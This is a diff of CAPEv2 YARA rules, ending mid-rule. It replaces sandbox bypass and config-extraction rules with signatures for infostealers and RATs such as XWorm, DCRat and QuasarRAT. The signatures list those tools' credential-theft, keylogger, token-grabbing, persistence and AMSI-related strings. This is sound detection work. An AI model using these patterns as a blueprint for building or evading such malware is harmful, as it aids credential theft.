+rule CAPE_Stormkitty : FILE
 {
 	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "cf155b6e-0821-5044-a84e-e4a101e55edd"
-		date = "2024-10-11"
-		modified = "2024-10-11"
+		description = "StormKitty infostealer payload"
+		author = "ditekSHen"
+		id = "71239da9-064f-58c4-a6fa-eb4983a3f55e"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Formbook.yar#L75-L87"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f52bce00d2ec88682115a8720f0a182b7ef7fe7b9b9fc466bb8ddc1779341509"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L32-L57"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "258f5d9da80ff912459194b1139f062491df21a44456942951e2bd98e4b86c9b"
 		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$c2,hc0=1,action0=string:rcx+1,bp1=$decoy,action1=string:rcx+1,count=0,typestring=Formbook Config"
-		packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1"
+		quality = 66
+		tags = "FILE"
+		cape_type = "StormKitty Payload"
 
 	strings:
-		$c2 = {49 8D 95 [2] 00 00 49 8D 8D [2] 00 00 41 B8 07 00 00 00 E8 [4] 49 8B CD 45 88 [3] 00 00 E8 [4] 33 C0}
-		$decoy = {48 8B CF E8 [4] 48 8B D7 44 8B C0 49 8B 85 [4] 49 (8D 8C 04 [2] 00 00|8D 0C 04) E8 [4] 48 8B CF E8}
+		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
+		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
+		$x3 = "StormKitty" fullword ascii
+		$s1 = "GetBSSID" fullword ascii
+		$s2 = "GetAntivirus" fullword ascii
+		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
+		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
+		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
+		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		$ww2 = "WorldWindClient" wide fullword nocase
+		$ww3 = "WorldWindStealer" wide fullword nocase
+		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
+		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
+		$prynt = /Prynt(\s)?Stealer/ ascii wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( not any of ( $ww* ) and not $prynt ) and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule CAPE_Anticuckoo : FILE
+rule CAPE_Worldwind : FILE
 {
 	meta:
-		description = "AntiCuckoo bypass: https://github.com/therealdreg/anticuckoo"
-		author = "kevoreilly"
-		id = "e221e57b-313e-5998-a3fc-5b4e9671b989"
-		date = "2023-03-17"
-		modified = "2023-03-17"
+		description = "Detects WorldWind infostealer"
+		author = "ditekSHen"
+		id = "226f591a-dc06-54f5-96ae-d142f624ff71"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/AntiCuckoo.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "ad5e52f144bb4a1dae3090978c6ecb4c7732538c9b62a6cedd32eccee6094be5"
-		logic_hash = "a039aeca2dae44980e8bffafacfda90975e107001be50f11ac916b35ad43592e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L60-L82"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$HKActivOldStackCrash+36,action0=jmp,count=1"
+		cape_type = "WorldWind Payload"
 
 	strings:
-		$HKActivOldStackCrash = {5B 81 FB FA FA FA FA 74 01 41 3B E0 75 ?? 83 E9 0B 83 F9 04 7F 04 C6 45 ?? 00 89 4D ?? 89 65 ?? 80 7D ?? 00 74}
+		$c1 = /WorldWind(\s)?Stealer/ ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$m1 = ".Passwords.Targets." ascii
+		$m2 = ".Modules.Keylogger" ascii
+		$m3 = ".Modules.Clipper" ascii
+		$m4 = ".Modules.Implant" ascii
+		$s1 = "--- Clipper" wide
+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
 }
-rule CAPE_Cargobayloader : FILE
+rule CAPE_Prynt : FILE
 {
 	meta:
-		description = "CargoBayLoader anti-vm bypass"
-		author = "kevoreilly"
-		id = "5b347863-0bea-55d2-aaf3-b3d6e604be89"
-		date = "2023-02-20"
-		modified = "2023-02-20"
+		description = "Detects Prynt infostealer"
+		author = "ditekSHen"
+		id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/CargoBayLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c"
-		logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L85-L107"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$jmp1+4,action0=skip,bp1=$jmp2+2,action1=skip,count=1,force-sleepskip=1"
+		cape_type = "Prynt Payload"
 
 	strings:
-		$jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8}
-		$jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8}
+		$c1 = /Prynt(\s)?Stealer/ ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$m1 = ".Passwords.Targets." ascii
+		$m2 = ".Modules.Keylogger" ascii
+		$m3 = ".Modules.Clipper" ascii
+		$m4 = ".Modules.Implant" ascii
+		$s1 = "--- Clipper" wide
+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
 }
-rule CAPE_Vbcrypter
+rule CAPE_Xworm : FILE
 {
 	meta:
-		description = "VBCrypter anti-hook Bypass"
-		author = "kevoreilly"
-		id = "2e010dfd-5096-5e81-af9b-174322a47d87"
-		date = "2021-03-28"
-		modified = "2021-03-28"
+		description = "Detects XWorm"
+		author = "ditekSHen"
+		id = "bf9115a7-850a-5326-860c-a9a71bc7e50c"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/VBCrypter.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "a62bca62ab624ab1a2c2e612c5b7e6d543006026a49c07c46800499e31e41c4e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L110-L136"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7"
 		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$antihook-12,action0=jmp,count=0"
+		quality = 68
+		tags = "FILE"
+		cape_type = "XWorm Payload"
 
 	strings:
-		$antihook = {43 39 C3 0F 84 ?? 00 00 00 80 3B B8 75 ?? 83 7B 01 00 75 ?? 80 7B 05 BA 75 ?? 8B 53 06 83 C3 0A 31 C9}
+		$x1 = "XWorm " wide nocase
+		$x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide
+		$s1 = "RunBotKiller" fullword wide
+		$s2 = "XKlog.txt" fullword wide
+		$s3 = /(shell|reg)fuc/ fullword wide
+		$s4 = "closeshell" fullword ascii
+		$s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 }
+		$s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 }
+		$s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 }
+		$s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 }
+		$v2_1 = "PING!" fullword wide
+		$v2_2 = "Urlhide" fullword wide
+		$v2_3 = /PC(Restart|Shutdown)/ fullword wide
+		$v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide
+		$v2_5 = /Offline(Get|Keylogger)/ wide
+		$v2_6 = "injRun" fullword wide
+		$v2_7 = "Xchat" fullword wide
+		$v2_8 = "UACFunc" fullword ascii wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v2* ) ) ) or 6 of them )
 }
-rule CAPE_Emotetpacker : FILE
+rule CAPE_Xworm_Kingrat
 {
 	meta:
-		description = "Emotet bypass"
-		author = "kevoreilly"
-		id = "67b8e14c-5fa8-52af-bb9a-1663b084fbf0"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "76332a42-97c9-52fe-83dc-04ceb367f692"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/EmotetPacker.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "5a95d1d87ce69881b58a0e3aafc1929861e2633cdd960021d7b23e2a36409e0d"
-		logic_hash = "5f27d9d18884f7e0805f69960869b332c1577bf8be8ac103285e8bf98cda0ffd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L138-L155"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "3914be652bb7271e5e6b89d05edf10a54f8ddaf9e22d194b60501aa2cdd495d3"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$trap1+31,action0=skip,bp1=$trap2+43,action1=jmp:186,count=1"
+		quality = 66
+		tags = ""
+		cape_type = "XWorm payload"
 
 	strings:
-		$trap1 = {8B 45 08 0F 28 0D [4] 0F 57 C0 0F 29 46 30 89 46 40 C7 46 44 00 00 00 00 0F 11 4E 48 E8}
-		$trap2 = {F2 0F 10 15 [4] BE 01 00 00 00 0F 01 F9 C7 44 24 60 00 00 00 00 89 4C 24 60 0F 01 F9 C7 44 24 5C 00 00 00 00 89 4C 24 5C 0F 1F 84 00 00 00 00 00}
+		$str_xworm = "xworm" wide ascii nocase
+		$str_xwormmm = "Xwormmm" wide ascii
+		$str_xclient = "XClient" wide ascii
+		$str_default_log = "\\Log.tmp" wide ascii
+		$str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii
+		$str_ddos_start = "StartDDos" wide ascii
+		$str_ddos_stop = "StopDDos" wide ascii
+		$str_timeout = "timeout 3 > NUL" wide ascii
+		$byte_md5_hash = { 7e [3] 04 28 [3] 06 6f }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $trap* )
+		5 of them and #patt_config >= 7
 }
-rule CAPE_Stealcanti : FILE
+rule CAPE_Dcrat : FILE
 {
 	meta:
-		description = "Stealc detonation bypass"
-		author = "kevoreilly"
-		id = "32e5c1cf-ef57-58eb-9deb-fab0064cc676"
-		date = "2024-01-19"
-		modified = "2024-01-19"
+		description = "DCRat payload"
+		author = "ditekSHen"
+		id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Stealc.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
-		logic_hash = "4132e8094b0b49a89e9f40a8b1a6abbf105bbb04e4ddf3ce739e39fc2baf0d13"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L157-L222"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = "FILE"
-		cape_options = "bp0=$anti+17,action0=skip,count=1"
+		cape_type = "DCRat Payload"
 
 	strings:
-		$anti = {53 57 57 57 FF 15 [4] 8B F0 74 03 75 01 B8 E8 [4] 74 03 75 01 B8}
-		$decode = {6A 03 33 D2 8B F8 59 F7 F1 8B C7 85 D2 74 04 2B C2 03 C1 6A 06 C1 E0 03 33 D2 59 F7 F1}
+		$dc1 = "DCRatBuild" ascii
+		$dc2 = "DCStlr" ascii
+		$x1 = "px\"><center>DCRat Keylogger" wide
+		$x2 = "DCRat-Log#" wide
+		$x3 = "DCRat.Code" wide
+		$string1 = "CaptureBrowsers" fullword ascii
+		$string2 = "DecryptBrowsers" fullword ascii
+		$string3 = "Browsers.IE10" ascii
+		$string4 = "Browsers.Chromium" ascii
+		$string5 = "WshShell" ascii
+		$string6 = "SysMngmts" fullword ascii
+		$string7 = "LoggerData" fullword ascii
+		$plugin = "DCRatPlugin" fullword ascii
+		$av1 = "AntiVM" ascii wide
+		$av2 = "vmware" fullword wide
+		$av3 = "VirtualBox" fullword wide
+		$av4 = "microsoft corporation" fullword wide
+		$av5 = "VIRTUAL" fullword wide
+		$av6 = "DetectVirtualMachine" fullword ascii
+		$av7 = "Select * from Win32_ComputerSystem" fullword wide
+		$pl1 = "dcratAPI" fullword ascii
+		$pl2 = "dsockapi" fullword ascii
+		$pl3 = "file_get_contents" fullword ascii
+		$pl4 = "classthis" fullword ascii
+		$pl5 = "typemdt" fullword ascii
+		$pl6 = "Plugin_AutoStealer" ascii wide
+		$pl7 = "Plugin_AutoKeylogger" ascii wide
+		$v1 = "Plugin couldn't process this action!" wide
+		$v2 = "Unknown command!" wide
+		$v3 = "PLUGINCONFIGS" wide
+		$v4 = "Saving log..." wide
+		$v5 = "~Work.log" wide
+		$v6 = "MicrophoneNum" fullword wide
+		$v7 = "WebcamNum" fullword wide
+		$v8 = "%SystemDrive% - Slow" wide
+		$v9 = "%UsersFolder% - Fast" wide
+		$v10 = "%AppData% - Very Fast" wide
+		$v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide
+		$px1 = "[Browsers] Scanned elements: " wide
+		$px2 = "[Browsers] Grabbing cookies" wide
+		$px3 = "[Browsers] Grabbing passwords" wide
+		$px4 = "[Browsers] Grabbing forms" wide
+		$px5 = "[Browsers] Grabbing CC" wide
+		$px6 = "[Browsers] Grabbing history" wide
+		$px7 = "[StealerPlugin] Invoke: " wide
+		$px8 = "[Other] Grabbing steam" wide
+		$px9 = "[Other] Grabbing telegram" wide
+		$px10 = "[Other] Grabbing discord tokens" wide
+		$px11 = "[Other] Grabbing filezilla" wide
+		$px12 = "[Other] Screenshots:" wide
+		$px13 = "[Other] Clipboard" wide
+		$px14 = "[Other] Saving system information" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $dc* ) or all of ( $string* ) or 2 of ( $x* ) or 6 of ( $v* ) or 5 of ( $px* ) ) or ( $plugin and ( 4 of ( $av* ) or 5 of ( $pl* ) ) )
 }
-rule CAPE_Stealcstrings : FILE
+rule CAPE_Dcrat_Kingrat
 {
 	meta:
-		description = "Stealc string decryption"
-		author = "kevoreilly"
-		id = "087b5532-e1e7-5df9-adb2-bf758c8ba352"
-		date = "2024-01-19"
-		modified = "2024-01-19"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "9b63e361-6678-5c95-be32-777feecd194b"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Stealc.yar#L15-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6d402446a979c00b6257ace9924db381d98c530b22968bd2776c66d58c7faefc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L224-L243"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "73ac27c3f0fc71d053e89690b5a7d29c1f8b0ea0a22e8595148a9001799fae54"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$decode+17,action0=string:edx,count=1,typestring=Stealc Strings"
-		packed = "d0c824e886f14b8c411940a07dc133012b9eed74901b156233ac4cac23378add"
+		quality = 62
+		tags = ""
+		cape_type = "DCRat Payload"
 
 	strings:
-		$decode = {51 8B 15 [4] 52 8B 45 ?? 50 E8 [4] 83 C4 0C 6A 04 6A 00 8D 4D ?? 51 FF 15 [4] 83 C4 0C 8B 45 ?? 8B E5 5D C3}
+		$venom_1 = "VenomRAT" wide ascii nocase
+		$venom_2 = "HVNC_REPLY_MESSAGE" wide ascii
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$str_b64_amsi = "YW1zaS5kbGw=" wide ascii
+		$str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii
+		$str_dcrat = "dcrat" wide ascii nocase
+		$str_plugin = "save_Plugin" wide ascii
+		$str_qwqdan = "qwqdan" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		( not any of ( $venom* ) ) and 5 of them and #patt_config >= 10
 }
-rule CAPE_Gettickcountantivm
+rule CAPE_Quasarrat : FILE
 {
 	meta:
-		description = "GetTickCountAntiVM bypass"
-		author = "kevoreilly"
-		id = "d90b9768-0525-5963-9817-e3a53b1d4cf3"
-		date = "2022-02-25"
-		modified = "2022-02-25"
+		description = "QuasarRAT payload"
+		author = "ditekshen"
+		id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/GetTickCountAntiVM.yar#L1-L20"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "662bc7839ed7ddd82d5fdafa29fafd9a9ec299c28820fe4104fbba9be1a09c42"
-		hash = "00f1537b13933762e1146e41f3bac668123fac7eacd0aa1f7be0aa37a91ef3ce"
-		hash = "549bca48d0bac94b6a1e6eb36647cd007fed5c0e75a0e4aa315ceabdafe46541"
-		hash = "90c29a66209be554dfbd2740f6a54d12616da35d0e5e4af97eb2376b9d053457"
-		logic_hash = "9cdb0b2d2e058e1858c2f2baad67005a2019fbbdcb7ca54571c8d20dfbf33471"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L245-L266"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$antivm1-13,bp0=$antivm5-40,bp0=$antivm6,action0=wret,hc0=1,bp1=$antivm2-6,action1=wret,hc1=1,count=1,bp2=$antivm3+42,action2=jmp:96,bp3=$antivm4-9,action3=wret,hc3=1"
+		tags = "FILE"
+		cape_type = "QuasarRAT Payload"
 
 	strings:
-		$antivm1 = {57 FF D6 FF D6 BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
-		$antivm2 = {F2 0F 11 45 ?? FF 15 [4] 6A 00 68 10 27 00 00 52 50 E8 [4] 8B C8 E8 [4] F2 0F 59 45}
-		$antivm3 = {0F 57 C0 E8 [4] 8B 35 [4] BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
-		$antivm4 = {F2 0F 11 45 EC FF 15 [4] 8B DA 8B C8 BA [4] 89 5D FC F7 E2 BF [4] 89 45 F4 8B F2 8B C1 B9}
-		$antivm5 = {BB 01 00 00 00 8B FB 90 FF 15 [4] FF C7 66 0F 6E C7 F3 0F E6 C0 66 0F 2F F8 73 EA}
-		$antivm6 = {48 81 EC 88 00 00 00 0F 57 C0 F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11}
+		$s1 = "GetKeyloggerLogsResponse" fullword ascii
+		$s2 = "GetKeyloggerLogs" fullword ascii
+		$s3 = "/>Log created on" wide
+		$s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide
+		$s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide
+		$s6 = "grabber_" wide
+		$s7 = "<virtualKeyCode>" ascii
+		$s8 = "<RunHidden>k__BackingField" fullword ascii
+		$s9 = "<keyboardHookStruct>" ascii
+		$s10 = "add_OnHotKeysDown" ascii
+		$mutex = "QSR_MUTEX_" ascii wide
+		$ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide
+		$us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( $mutex or ( all of ( $ua* ) and 2 of them ) or 6 of ( $s* ) )
 }
-rule CAPE_Slowloader
+rule CAPE_Quasarrat_Kingrat
 {
 	meta:
-		description = "SlowLoader detonation aide for slow cpus (thread race)"
-		author = "kevoreilly"
-		id = "05724bf4-b767-542d-a2dd-a9ae3e5ea5cc"
-		date = "2024-09-23"
-		modified = "2024-09-23"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "dc0139e1-9f69-51da-b28f-212358b2f68b"
+		date = "2025-02-03"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/SlowLoader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f07528c646ebd980a5e843caa4a4715e31b22c3cd091576600e9fe45d7fc2fe4"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/AsyncRAT.yar#L268-L287"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "1f4296a592134edbe52e256dc353143af02e897ff1afad98f3dac0c5ab13f3f7"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "break-on-return=CreateProcessA,action0=sleep:1000,count=0"
-		packed = "f6eeb73ffb3e6d6cc48f74344cb590614db7e3116ba00a52aefd7dff468a60a5"
+		cape_type = "QuasarRAT Payload"
 
 	strings:
-		$code = {0F B6 44 07 08 0F B6 54 1F 08 03 C2 25 FF 00 00 80 79 07 48 0D 00 FF FF FF 40 89 45 ?? 6A 00}
+		$str_quasar = "Quasar." wide ascii
+		$str_hidden = "set_Hidden" wide ascii
+		$str_shell = "DoShellExecuteResponse" wide ascii
+		$str_close = "echo DONT CLOSE THIS WINDOW!" wide ascii
+		$str_pause = "ping -n 10 localhost > nul" wide ascii
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 }
+		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
+		$byte_special_folder = { 7e 73 [4] 28 [4] 80 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
 
 	condition:
-		any of them
+		6 of them and #patt_config >= 10
 }
-rule CAPE_Pikahook : FILE
+rule CAPE_Scarab : FILE
 {
 	meta:
-		description = "Pikabot anti-hook bypass"
+		description = "Scarab Payload"
 		author = "kevoreilly"
-		id = "e1b7a807-135f-52d7-bc36-c0419e82b424"
-		date = "2024-03-12"
-		modified = "2024-03-12"
+		id = "2ba8ae50-1e56-5773-aaea-058161b59c78"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/analyzer/windows/data/yara/Pikabot.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "2a50a5f2d905122a5b7ac8ca3666b47caa24d325e246841129e53807daf2a1dd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Scarab.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
